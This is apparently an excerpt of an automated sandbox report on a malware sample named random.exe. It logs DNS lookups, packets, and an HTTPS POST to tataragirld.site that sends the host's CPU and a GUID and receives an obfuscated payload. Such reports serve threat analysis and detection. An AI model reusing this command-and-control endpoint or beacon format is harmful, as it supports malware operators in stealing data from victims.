                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.696063995 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.696449995 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.696547031 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.696578979 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.702498913 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.702498913 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.702682972 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.702934980 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.703047991 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.799227953 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.799237967 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.799849987 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.800882101 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.800890923 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.801255941 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.801688910 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.801789045 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.806787968 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.897782087 CET44356181162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:21.930594921 CET56181443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.168344021 CET192.168.2.41.1.1.1c249(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.188838005 CET192.168.2.41.1.1.10xa53aStandard query (0)tataragirld.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.762113094 CET192.168.2.41.1.1.10x18cdStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.764544964 CET192.168.2.41.1.1.10xe832Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.151782990 CET192.168.2.41.1.1.10x95c1Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.151932955 CET192.168.2.41.1.1.10x8052Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.460496902 CET192.168.2.41.1.1.10x963dStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.460736990 CET192.168.2.41.1.1.10xe30bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.141738892 CET192.168.2.41.1.1.10x2444Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.141886950 CET192.168.2.41.1.1.10x7656Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.149406910 CET192.168.2.41.1.1.10xe81aStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.149544954 CET192.168.2.41.1.1.10x2146Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.157380104 CET192.168.2.41.1.1.10x1babStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.157553911 CET192.168.2.41.1.1.10x24feStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.167038918 CET192.168.2.41.1.1.10x728bStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.167182922 CET192.168.2.41.1.1.10x1316Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.803713083 CET192.168.2.41.1.1.10xe0a8Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.803865910 CET192.168.2.41.1.1.10xabcbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.805295944 CET192.168.2.41.1.1.10x21daStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.805485964 CET192.168.2.41.1.1.10xf8bbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.884852886 CET192.168.2.41.1.1.10xe15cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.885261059 CET192.168.2.41.1.1.10x1ee6Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.809482098 CET192.168.2.41.1.1.10x4f60Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.809611082 CET192.168.2.41.1.1.10xd94bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.810003042 CET192.168.2.41.1.1.10xe75dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.810230970 CET192.168.2.41.1.1.10x9862Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.202415943 CET1.1.1.1192.168.2.40xa53aNo error (0)tataragirld.site188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:28.202415943 CET1.1.1.1192.168.2.40xa53aNo error (0)tataragirld.site188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.768671036 CET1.1.1.1192.168.2.40x18cdNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:38.771918058 CET1.1.1.1192.168.2.40xe832No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.159063101 CET1.1.1.1192.168.2.40x8052No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.160383940 CET1.1.1.1192.168.2.40x95c1No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.467789888 CET1.1.1.1192.168.2.40x963dNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.467789888 CET1.1.1.1192.168.2.40x963dNo error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:40.469868898 CET1.1.1.1192.168.2.40xe30bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148585081 CET1.1.1.1192.168.2.40x2444No error (0)sb.scorecardresearch.com13.32.110.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148585081 CET1.1.1.1192.168.2.40x2444No error (0)sb.scorecardresearch.com13.32.110.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148585081 CET1.1.1.1192.168.2.40x2444No error (0)sb.scorecardresearch.com13.32.110.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.148585081 CET1.1.1.1192.168.2.40x2444No error (0)sb.scorecardresearch.com13.32.110.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.155810118 CET1.1.1.1192.168.2.40xe81aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.164051056 CET1.1.1.1192.168.2.40x24feNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.164159060 CET1.1.1.1192.168.2.40x1babNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.168277979 CET1.1.1.1192.168.2.40x2146No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.173675060 CET1.1.1.1192.168.2.40x728bNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:41.173918009 CET1.1.1.1192.168.2.40x1316No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.009681940 CET1.1.1.1192.168.2.40xfb87No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.009681940 CET1.1.1.1192.168.2.40xfb87No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.810317039 CET1.1.1.1192.168.2.40xabcbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.810610056 CET1.1.1.1192.168.2.40xe0a8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.810610056 CET1.1.1.1192.168.2.40xe0a8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.811873913 CET1.1.1.1192.168.2.40x21daNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.811873913 CET1.1.1.1192.168.2.40x21daNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.812210083 CET1.1.1.1192.168.2.40xf8bbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.891494036 CET1.1.1.1192.168.2.40xe15cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.891494036 CET1.1.1.1192.168.2.40xe15cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:32:42.891773939 CET1.1.1.1192.168.2.40x1ee6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816122055 CET1.1.1.1192.168.2.40x4f60No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816122055 CET1.1.1.1192.168.2.40x4f60No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816164017 CET1.1.1.1192.168.2.40xd94bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816476107 CET1.1.1.1192.168.2.40xe75dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816476107 CET1.1.1.1192.168.2.40xe75dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Jan 3, 2025 23:33:06.816854954 CET1.1.1.1192.168.2.40x9862No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  • tataragirld.site
                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    • c.msn.com
                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  0192.168.2.449737188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:28 UTC366OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  Content-Length: 147
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:28 UTC147OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 60 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 87 f9 84 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:29 GMT
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQgOwWBWkRofNdkrTuE9S6kPIJ7mJKOk7pdBCt%2F3obBtrLUdhLMlUeJhQQEVuZYsxKJqavM3%2FmV0oWw2aYxibogmEGIDsrQb7%2BvXgxN5YkuAqkQkSprEMd7%2FqdSMX9rdOoVZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc671ebda877c69-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2018&rtt_var=774&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1149&delivery_rate=1399137&cwnd=171&unsent_bytes=0&cid=7ff9844a3852270f&ts=397&x=0"
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 33 32 66 32 0d 0a 00 00 00 00 5d 7f 00 00 00 00 00 00 f3 d2 c0 1a 0d 00 12 00 dd 09 aa 0c dd 09 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 88 ce d6 d2 c8 50 b6 f8 ce f4 d2 de da 1e 00 12 00 ea 06 ee 0e ea 06 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 8e fa f8 c8 ce ce c6 be c2 cc 92 f0 f0 96 c8 d2 f6 f6 c2 d6 a8 d8 d2 f8 d2 4c c4 f6 ce cc 08 00 12 00 8a 08 fe 05 8a 08 1f ba 08 ba 0c 1c 14 8a 78 e8 9e 41 c0 bd 45 c5 f2 ab de 15 5c e6 25 a9 19 00 12 00 7d 01 42 04 7d 01 1f d0 08 d0 0c 1c 14 1d 01 29 9a 98 30 0a 89 93 9c c2 c8 da a4 c2 c8 c8 d2 a8 f6 c2 f8 da ca d2 cc d2 de da f4 4c e0 ca c8 08 00 12 00 e9 0b ff 05 e9 0b 1f ba 08 ba 0c 1c 14 49 b0 a8 8e 77 e6 24 69 b2 3f eb ce 23 7a 7f 09 de 0b 00 12 00 6e 0d 0e 0a 6e 0d 1f d0 08 d0 0c 1c 14 99 01
                                                                                                                                                                                                                                                                                  Data Ascii: 32f2])0PI)0LxAE\%}B})0LIw$i?#znn
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: dc c2 de d6 d2 da c4 f0 dc c0 dc da de da c6 d8 de c2 d4 c8 c6 ae 70 4c c2 cc d8 da e0 da d8 d8 d4 4c c8 da fc da c8 d8 d4 11 00 12 00 e5 08 1f 04 e5 08 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 d6 c0 f4 ce ca c2 fa ca ae d4 f4 ce fe f6 da f4 f6 11 00 12 00 be 0c e2 03 be 0c 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 d6 c0 f4 ce ca c2 fa ca ae d4 f4 ce fe f6 da f4 f6 0a 00 12 00 50 06 dd 0b 50 06 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 ca f6 da d8 de da 4c da e0 da 14 00 12 00 b4 02 55 0b b4 02 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 b8 c0 fa cc d8 da f4 d4 c2 f4 d8 a8 b0 f4 ce dc c2 c8 da f6 05 00 12 00 87 04 b8 0d 87 04 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 44 4c c8 d8 d4 10 00 12 00 20 06 7d 04 20 06 1f d0 08 d0 0c
                                                                                                                                                                                                                                                                                  Data Ascii: pLL)0)0PP)0LUI)0)0DL }
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: e4 11 8f 04 00 0e 00 47 0d 13 0c 47 0d 1f c0 04 c0 0c 1c 14 cc f7 35 8a 79 27 d8 9f 89 08 00 12 00 40 0c 5f 03 40 0c 1f ba 08 ba 0c 1c 14 49 bf 26 8f a1 b0 f1 ee 88 34 65 cf f5 2c aa 8e e4 16 00 12 00 34 0e 6b 0d 34 0e 1f d0 08 d0 0c 1c 14 51 01 29 9a 98 30 0a 89 93 ca da f6 f6 da cc de da f4 f6 a8 98 c2 f6 d6 ce f4 d8 a8 b0 f8 d4 0b 00 12 00 79 09 19 0a 79 09 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 88 ce d6 d2 c8 50 b6 f8 d2 f8 da 08 00 12 00 c6 0a 5c 0e c6 0a 1f d0 08 d0 0c 1c 14 f3 01 29 9a 98 30 0a 89 93 da d8 de da 4c da e0 da 39 00 12 00 dd 03 97 08 dd 03 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 b6 8e 9c b8 be 92 b4 9a a8 8a c2 d6 f4 ce f6 ce dc f8 a8 8e dc dc c2 d6 da a8 72 7c 4c 70 a8 96 ce ca ca ce cc a8 82 d8 da cc f8 c2 f8 e2 a8
                                                                                                                                                                                                                                                                                  Data Ascii: GG5y'@_@I&4e,4k4Q)0yy)0P\)0L9I)0r|Lp
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 00 0e 00 37 06 40 04 37 06 1f c0 04 c0 0c 1c 14 d3 a2 96 46 a7 73 9a a6 52 14 00 12 00 86 05 0b 09 86 05 1f d0 08 d0 0c 1c 14 cc 01 29 9a 98 30 0a 89 93 9a e0 ce d8 fa f6 a8 da e0 ce d8 fa f6 4c fe d2 c8 c8 da f8 08 00 12 00 5a 08 8d 03 5a 08 1f ba 08 ba 0c 1c 14 8a 39 69 d2 32 ad 5e 49 31 b2 2a 92 66 31 05 29 5d 0c 00 12 00 47 0b e2 0e 47 0b 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 88 d2 f6 f8 50 bc da f4 f6 c2 ce cc 11 00 12 00 12 0d 55 04 12 0d 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 d6 c0 f4 ce ca c2 fa ca ae d4 f4 ce fe f6 da f4 f6 0a 00 12 00 60 04 68 08 60 04 1f d0 08 d0 0c 1c 14 f3 01 29 9a 98 30 0a 89 93 ca f6 da d8 de da 4c da e0 da 0a 00 12 00 fa 05 57 05 fa 05 1f d0 08 d0 0c 1c 14 65 01 29 9a 98 30 0a 89 93 f0 c6 d6 f6 72 72 4c
                                                                                                                                                                                                                                                                                  Data Ascii: 7@7FsR)0LZZ9i2^I1*f1)]GG)0PU)0`h`)0LWe)0rrL
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 1f d0 08 d0 0c 1c 14 51 01 29 9a 98 30 0a 89 93 ca da f6 f6 da cc de da f4 f6 a8 b8 da c8 da de f4 d2 ca a8 98 da f6 c6 f8 ce f0 a8 f8 d8 d2 f8 d2 08 00 12 00 c7 0c 35 09 c7 0c 1f ba 08 ba 0c 1c 14 49 a0 3f 24 0c 3b b4 c2 33 2f 7c 64 58 a7 ef a2 5f 24 00 12 00 fa 0d 57 04 fa 0d 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 9e ce ce de c8 da a8 96 c0 f4 ce ca da a8 92 f0 f0 c8 c2 d6 d2 f8 c2 ce cc a8 d6 c0 f4 ce ca da 4c da e0 da 08 00 12 00 69 05 21 02 69 05 1f ba 08 ba 0c 1c 14 1d be ce c5 ff ab 10 7e c0 34 8d 85 ab 37 4b 1e ac 15 00 12 00 66 02 a8 06 66 02 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 8e fa f8 c8 ce ce c6 74 70 72 7c a8 d8 d2 f8 d2 4c c4 f6 ce cc 08 00 12 00 17 0b 45 0c 17 0b 1f ba 08 ba 0c 1c 14 d3 c9 9c 20 a2 24 2d 2d f7 42 df 60
                                                                                                                                                                                                                                                                                  Data Ascii: Q)05I?$;3/|dX_$W)0Li!i~47KffI)0tpr|LE $--B`
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: cf 91 72 08 00 12 00 39 03 53 06 39 03 1f ba 08 ba 0c 1c 14 f3 c3 60 35 b4 b4 6e f1 9d 48 23 75 e0 28 35 91 f1 04 00 0e 00 cb 04 29 05 cb 04 1f c0 04 c0 0c 1c 14 cc c0 a4 91 1f 10 49 84 ef 08 00 12 00 0d 0b 35 0f 0d 0b 1f ba 08 ba 0c 1c 14 49 ce 3c 64 33 0c 5f d4 3e 40 7f 24 67 90 04 b4 52 24 00 12 00 b6 04 3f 03 b6 04 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 9e ce ce de c8 da a8 96 c0 f4 ce ca da a8 92 f0 f0 c8 c2 d6 d2 f8 c2 ce cc a8 d6 c0 f4 ce ca da 4c da e0 da 08 00 12 00 a1 0d 57 0c a1 0d 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 f0 f4 ce dc c2 c8 da f6 08 00 12 00 42 0b 71 0f 42 0b 1f d0 08 d0 0c 1c 14 51 01 29 9a 98 30 0a 89 93 f6 da f8 f8 c2 cc de f6 0b 00 12 00 5e 0f 59 09 5e 0f 1f d0 08 d0 0c 1c 14 cc 01 29 9a 98 30 0a 89 93 94 c2
                                                                                                                                                                                                                                                                                  Data Ascii: r9S9`5nH#u(5)I5I<d3_>@$gR$?)0LW)0BqBQ)0^Y^)0
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 79 0f e6 08 00 12 00 c5 03 7e 01 c5 03 1f ba 08 ba 0c 1c 14 d3 42 75 e5 d3 dc 55 2f 3c c3 36 a5 87 40 0e 4f 50 0a 00 12 00 c0 02 76 02 c0 02 1f d0 08 d0 0c 1c 14 d3 01 29 9a 98 30 0a 89 93 d6 c0 f4 ce ca da 4c da e0 da 0a 00 12 00 0c 0a 1e 06 0c 0a 1f d0 08 d0 0c 1c 14 1d 01 29 9a 98 30 0a 89 93 b0 ce f4 f8 8c fa ca d4 da f4 09 00 12 00 99 06 2a 03 99 06 1f d0 08 d0 0c 1c 14 1d 01 29 9a 98 30 0a 89 93 b0 f4 ce e0 e2 b0 ce f4 f8 04 00 0e 00 0b 0d 9a 0d 0b 0d 1f c0 04 c0 0c 1c 14 8a fa c7 fe c5 7a 08 1e 30 04 00 0e 00 0d 01 e0 05 0d 01 1f c0 04 c0 0c 1c 14 cc 4a 62 8f 02 9a 6a 6f f7 0c 00 12 00 5b 01 99 04 5b 01 1f d0 08 d0 0c 1c 14 99 01 29 9a 98 30 0a 89 93 f6 da f4 fc c2 d6 da 4c d6 ce cc dc 04 00 0e 00 bc 0e 13 02 bc 0e 1f c0 04 c0 0c 1c 14 d3 c6 dc e3
                                                                                                                                                                                                                                                                                  Data Ascii: y~BuU/<6@OPv)0L)0*)0z0Jbjo[[)0L
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 01 1f c0 04 c0 0c 1c 14 94 19 ce 4d bf c8 c2 ad 4a 08 00 12 00 6d 06 15 03 6d 06 1f ba 08 ba 0c 1c 14 99 74 31 76 4e 74 3d b7 76 fe 72 36 1a e8 66 d7 1a 04 00 0e 00 e1 01 67 09 e1 01 1f c0 04 c0 0c 1c 14 49 1b 3c 38 37 ca 30 d8 c2 04 00 0e 00 c3 00 ae 0b c3 00 1f c0 04 c0 0c 1c 14 d3 f8 f6 19 d7 28 1b 0c 27 17 00 12 00 79 0d 21 01 79 0d 1f d0 08 d0 0c 1c 14 1d 01 29 9a 98 30 0a 89 93 dc f8 f0 a8 be c2 cc b6 96 b0 a8 f4 da de c2 f6 f8 f4 e2 4c d4 c2 cc 32 00 12 00 f9 0b eb 02 f9 0b 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 b0 d2 d6 c6 d2 de da f6 a8 8a c2 d6 f4 ce f6 ce dc f8 4c 8e fa f8 c8 ce ce c6 9c ce f4 be c2 cc d8 ce fe f6 ae 60 fe da c6 e2 d4 76 d8 60 d4 d4 fe da 13 00 12 00 9c 06 54 0c 9c 06 1f d0 08 d0 0c 1c 14 51 01 29 9a 98 30 0a 89 93 d8
